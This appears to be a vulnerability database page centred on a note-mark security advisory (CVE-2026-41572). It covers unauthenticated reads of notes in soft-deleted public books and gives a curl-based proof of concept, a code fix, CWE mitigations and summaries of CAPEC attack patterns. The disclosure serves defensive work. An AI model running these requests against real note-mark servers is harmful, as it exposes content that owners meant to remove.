      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29827"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29827"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3GR9-485J-V4XF

Vulnerability from github – Published: 2026-04-25 23:40 – Updated: 2026-05-07 20:20
VLAI
Summary
Note Mark: Unauthenticated read of notes and assets in soft-deleted public books
Details

Summary

After a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw JOIN books ... clauses used by the note and asset queries.

Details

DELETE /api/books/{bookID} sets books.deleted_at to the current time. The book-level endpoint starts returning 404, which matches the owner's expectation that the book is gone. The note service and asset service query notes with a raw join that does not filter books.deleted_at IS NULL:

// backend/services/notes.go:91-98 (GetNoteByID)
func (s NotesService) GetNoteByID(currentUserID *uuid.UUID, noteID uuid.UUID) (db.Note, error) {
    var note db.Note
    return note, dbErrorToServiceError(db.DB.
        Preload("Book").
        Joins("JOIN books ON books.id = notes.book_id").
        Where("owner_id = ? OR is_public = ?", currentUserID, true).
        First(&note, "notes.id = ?", noteID).Error)
}

GORM applies its soft-delete scope to the primary model of a query (here, notes) and to implicit Joins("Book") association clauses. It does not rewrite raw SQL passed to Joins. The soft-deleted book row keeps is_public = true, so the WHERE owner_id = ? OR is_public = ? clause still evaluates true for any caller on a book that was public at deletion time. For an unauthenticated caller (currentUserID = nil), owner_id = NULL fails but is_public = true passes, so the note query returns the row.

note-mark has a restore flow at PUT /api/notes/{noteID}/restore (backend/services/notes.go:232-262) that un-deletes the note and the parent book in one transaction. Owner access to soft-deleted notes is deliberate for that path; the comment at line 253 spells out the intent. The bug is that is_public = true survives the deletion, so unauthenticated callers keep access the owner chose to revoke.

The same raw-join pattern repeats at 9 more call sites in backend/services/notes.go (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and 4 call sites in backend/services/assets.go (lines 29, 73, 106, 143). Every public endpoint that reads a note or an asset inherits the bug.

Proof of Concept

Tested against note-mark v0.19.2.

Step 1: Start note-mark.

docker run -d --name note-mark-poc -p 8088:8080 \
  ghcr.io/enchant97/note-mark-backend:0.19.2

Step 2: Alice signs up and logs in.

curl -X POST http://localhost:8088/api/users \
  -H 'Content-Type: application/json' \
  -d '{"username":"alice","password":"Alicepass123!","name":"Alice"}'

curl -c alice.cookies -X POST http://localhost:8088/api/auth/token \
  -H 'Content-Type: application/json' \
  -d '{"grant_type":"password","username":"alice","password":"Alicepass123!"}'

Step 3: Alice creates a public book and adds a note with content. Save the IDs from each response.

curl -b alice.cookies -X POST http://localhost:8088/api/books \
  -H 'Content-Type: application/json' \
  -d '{"name":"Alice Public Book","slug":"public-book","isPublic":true}'
# {"id":"<BOOK_ID>", ...}

curl -b alice.cookies -X POST http://localhost:8088/api/books/<BOOK_ID>/notes \
  -H 'Content-Type: application/json' \
  -d '{"name":"Secret Note","slug":"secret-note"}'
# {"id":"<NOTE_ID>", ...}

curl -b alice.cookies -X PUT http://localhost:8088/api/notes/<NOTE_ID>/content \
  -H 'Content-Type: text/plain' \
  --data 'This is Alice secret note content.'

Step 4: Bob (no cookie) reads the note while the book is still live. This is expected for a public book.

curl http://localhost:8088/api/notes/<NOTE_ID>/content
# This is Alice secret note content.

Step 5: Alice soft-deletes the book.

curl -b alice.cookies -X DELETE http://localhost:8088/api/books/<BOOK_ID>
# HTTP/1.1 204 No Content

Step 6: The book endpoint 404s. The note endpoints still serve Alice's content to Bob.

curl -w "\n%{http_code}\n" http://localhost:8088/api/books/<BOOK_ID>
# 404

curl -w "\n%{http_code}\n" http://localhost:8088/api/notes/<NOTE_ID>
# {"id":"<NOTE_ID>","name":"Secret Note", ...}
# 200

curl http://localhost:8088/api/notes/<NOTE_ID>/content
# This is Alice secret note content.

curl http://localhost:8088/api/slug/alice/books/public-book/notes/secret-note
# {"id":"<NOTE_ID>","name":"Secret Note", ...}

A companion script that drives Steps 1-6 ships at pocs/poc_005_bac_soft_deleted_book.sh.

Impact

Any owner who soft-deletes a public book expecting the content to drop off the internet is wrong. Notes, markdown content, and uploaded assets stay readable for every unauthenticated caller who knows the note ID or the slug path. Slugs are human-readable and change hands in documentation, notes, and bug trackers. The leak covers every public note and asset endpoint, not a single handler. Private books are not affected because is_public = false and owner_id = NULL both fail the visibility check for non-owners.

Recommended Fix

Add a soft-delete filter to the visibility clause on every raw Joins("JOIN books ..."). Keep the owner's access intact so the restore flow at PUT /api/notes/{id}/restore continues to work:

// backend/services/notes.go:91-98 (GetNoteByID)
return note, dbErrorToServiceError(db.DB.
    Preload("Book").
    Joins("JOIN books ON books.id = notes.book_id").
    Where("(books.deleted_at IS NULL OR books.owner_id = ?)", currentUserID).
    Where("owner_id = ? OR is_public = ?", currentUserID, true).
    First(&note, "notes.id = ?", noteID).Error)

The same transform applies to each of the 13 call sites in backend/services/notes.go (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and backend/services/assets.go (lines 29, 73, 106, 143). backend/cli/clean.go:31 uses the same join pattern but is a maintenance CLI and does not need the fix.


Found by aisafe.io

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/enchant97/note-mark/backend"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260417132843-d1bf845a2a2d"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41572"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-25T23:40:37Z",
    "nvd_published_at": "2026-05-04T18:16:29Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nAfter a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at `/api/notes/{id}`, `/api/notes/{id}/content`, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM\u0027s soft-delete scope does not reach the raw `JOIN books ...` clauses used by the note and asset queries.\n\n## Details\n\n`DELETE /api/books/{bookID}` sets `books.deleted_at` to the current time. The book-level endpoint starts returning 404, which matches the owner\u0027s expectation that the book is gone. The note service and asset service query notes with a raw join that does not filter `books.deleted_at IS NULL`:\n\n```go\n// backend/services/notes.go:91-98 (GetNoteByID)\nfunc (s NotesService) GetNoteByID(currentUserID *uuid.UUID, noteID uuid.UUID) (db.Note, error) {\n    var note db.Note\n    return note, dbErrorToServiceError(db.DB.\n        Preload(\"Book\").\n        Joins(\"JOIN books ON books.id = notes.book_id\").\n        Where(\"owner_id = ? OR is_public = ?\", currentUserID, true).\n        First(\u0026note, \"notes.id = ?\", noteID).Error)\n}\n```\n\nGORM applies its soft-delete scope to the primary model of a query (here, `notes`) and to implicit `Joins(\"Book\")` association clauses. It does not rewrite raw SQL passed to `Joins`. The soft-deleted book row keeps `is_public = true`, so the `WHERE owner_id = ? OR is_public = ?` clause still evaluates true for any caller on a book that was public at deletion time. For an unauthenticated caller (`currentUserID = nil`), `owner_id = NULL` fails but `is_public = true` passes, so the note query returns the row.\n\nnote-mark has a restore flow at `PUT /api/notes/{noteID}/restore` (`backend/services/notes.go:232-262`) that un-deletes the note and the parent book in one transaction. Owner access to soft-deleted notes is deliberate for that path; the comment at line 253 spells out the intent. The bug is that `is_public = true` survives the deletion, so unauthenticated callers keep access the owner chose to revoke.\n\nThe same raw-join pattern repeats at 9 more call sites in `backend/services/notes.go` (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and 4 call sites in `backend/services/assets.go` (lines 29, 73, 106, 143). Every public endpoint that reads a note or an asset inherits the bug.\n\n## Proof of Concept\n\nTested against `note-mark` v0.19.2.\n\nStep 1: Start note-mark.\n\n```bash\ndocker run -d --name note-mark-poc -p 8088:8080 \\\n  ghcr.io/enchant97/note-mark-backend:0.19.2\n```\n\nStep 2: Alice signs up and logs in.\n\n```bash\ncurl -X POST http://localhost:8088/api/users \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"alice\",\"password\":\"Alicepass123!\",\"name\":\"Alice\"}\u0027\n\ncurl -c alice.cookies -X POST http://localhost:8088/api/auth/token \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"grant_type\":\"password\",\"username\":\"alice\",\"password\":\"Alicepass123!\"}\u0027\n```\n\nStep 3: Alice creates a public book and adds a note with content. Save the IDs from each response.\n\n```bash\ncurl -b alice.cookies -X POST http://localhost:8088/api/books \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"name\":\"Alice Public Book\",\"slug\":\"public-book\",\"isPublic\":true}\u0027\n# {\"id\":\"\u003cBOOK_ID\u003e\", ...}\n\ncurl -b alice.cookies -X POST http://localhost:8088/api/books/\u003cBOOK_ID\u003e/notes \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"name\":\"Secret Note\",\"slug\":\"secret-note\"}\u0027\n# {\"id\":\"\u003cNOTE_ID\u003e\", ...}\n\ncurl -b alice.cookies -X PUT http://localhost:8088/api/notes/\u003cNOTE_ID\u003e/content \\\n  -H \u0027Content-Type: text/plain\u0027 \\\n  --data \u0027This is Alice secret note content.\u0027\n```\n\nStep 4: Bob (no cookie) reads the note while the book is still live. This is expected for a public book.\n\n```bash\ncurl http://localhost:8088/api/notes/\u003cNOTE_ID\u003e/content\n# This is Alice secret note content.\n```\n\nStep 5: Alice soft-deletes the book.\n\n```bash\ncurl -b alice.cookies -X DELETE http://localhost:8088/api/books/\u003cBOOK_ID\u003e\n# HTTP/1.1 204 No Content\n```\n\nStep 6: The book endpoint 404s. The note endpoints still serve Alice\u0027s content to Bob.\n\n```bash\ncurl -w \"\\n%{http_code}\\n\" http://localhost:8088/api/books/\u003cBOOK_ID\u003e\n# 404\n\ncurl -w \"\\n%{http_code}\\n\" http://localhost:8088/api/notes/\u003cNOTE_ID\u003e\n# {\"id\":\"\u003cNOTE_ID\u003e\",\"name\":\"Secret Note\", ...}\n# 200\n\ncurl http://localhost:8088/api/notes/\u003cNOTE_ID\u003e/content\n# This is Alice secret note content.\n\ncurl http://localhost:8088/api/slug/alice/books/public-book/notes/secret-note\n# {\"id\":\"\u003cNOTE_ID\u003e\",\"name\":\"Secret Note\", ...}\n```\n\nA companion script that drives Steps 1-6 ships at `pocs/poc_005_bac_soft_deleted_book.sh`.\n\n## Impact\n\nAny owner who soft-deletes a public book expecting the content to drop off the internet is wrong. Notes, markdown content, and uploaded assets stay readable for every unauthenticated caller who knows the note ID or the slug path. Slugs are human-readable and change hands in documentation, notes, and bug trackers. The leak covers every public note and asset endpoint, not a single handler. Private books are not affected because `is_public = false` and `owner_id = NULL` both fail the visibility check for non-owners.\n\n## Recommended Fix\n\nAdd a soft-delete filter to the visibility clause on every raw `Joins(\"JOIN books ...\")`. Keep the owner\u0027s access intact so the restore flow at `PUT /api/notes/{id}/restore` continues to work:\n\n```go\n// backend/services/notes.go:91-98 (GetNoteByID)\nreturn note, dbErrorToServiceError(db.DB.\n    Preload(\"Book\").\n    Joins(\"JOIN books ON books.id = notes.book_id\").\n    Where(\"(books.deleted_at IS NULL OR books.owner_id = ?)\", currentUserID).\n    Where(\"owner_id = ? OR is_public = ?\", currentUserID, true).\n    First(\u0026note, \"notes.id = ?\", noteID).Error)\n```\n\nThe same transform applies to each of the 13 call sites in `backend/services/notes.go` (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and `backend/services/assets.go` (lines 29, 73, 106, 143). `backend/cli/clean.go:31` uses the same join pattern but is a maintenance CLI and does not need the fix.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-3gr9-485j-v4xf",
  "modified": "2026-05-07T20:20:15Z",
  "published": "2026-04-25T23:40:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41572"
    },
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/commit/d1bf845a2a2df01e2eca6f556287db4ec6f773cf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/enchant97/note-mark"
    },
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/releases/tag/v0.19.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Note Mark: Unauthenticated read of notes and assets in soft-deleted public books"
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor.

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-104: Cross Zone Scripting

An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.

CAPEC-127: Directory Indexing

An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.

CAPEC-13: Subverting Environment Variable Values

The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.

CAPEC-17: Using Malicious Files

An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.

CAPEC-39: Manipulating Opaque Client-based Data Tokens

In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.

CAPEC-402: Bypassing ATA Password Security

An adversary exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.

CAPEC-45: Buffer Overflow via Symbolic Links

This type of attack leverages the use of symbolic links to cause buffer overflows. An adversary can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.

CAPEC-5: Blue Boxing

This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.

{'xhtml:b': 'This attack pattern is included in CAPEC for historical purposes.'}

CAPEC-51: Poison Web Service Registry

SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces.

CAPEC-59: Session Credential Falsification through Prediction

This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

CAPEC-60: Reusing Session IDs (aka Session Replay)

This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.

CAPEC-647: Collect Data from Registries

An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. The adversary can leverage information gathered in order to carry out further attacks.

CAPEC-668: Key Negotiation of Bluetooth Attack (KNOB)

An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

CAPEC-87: Forceful Browsing

An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.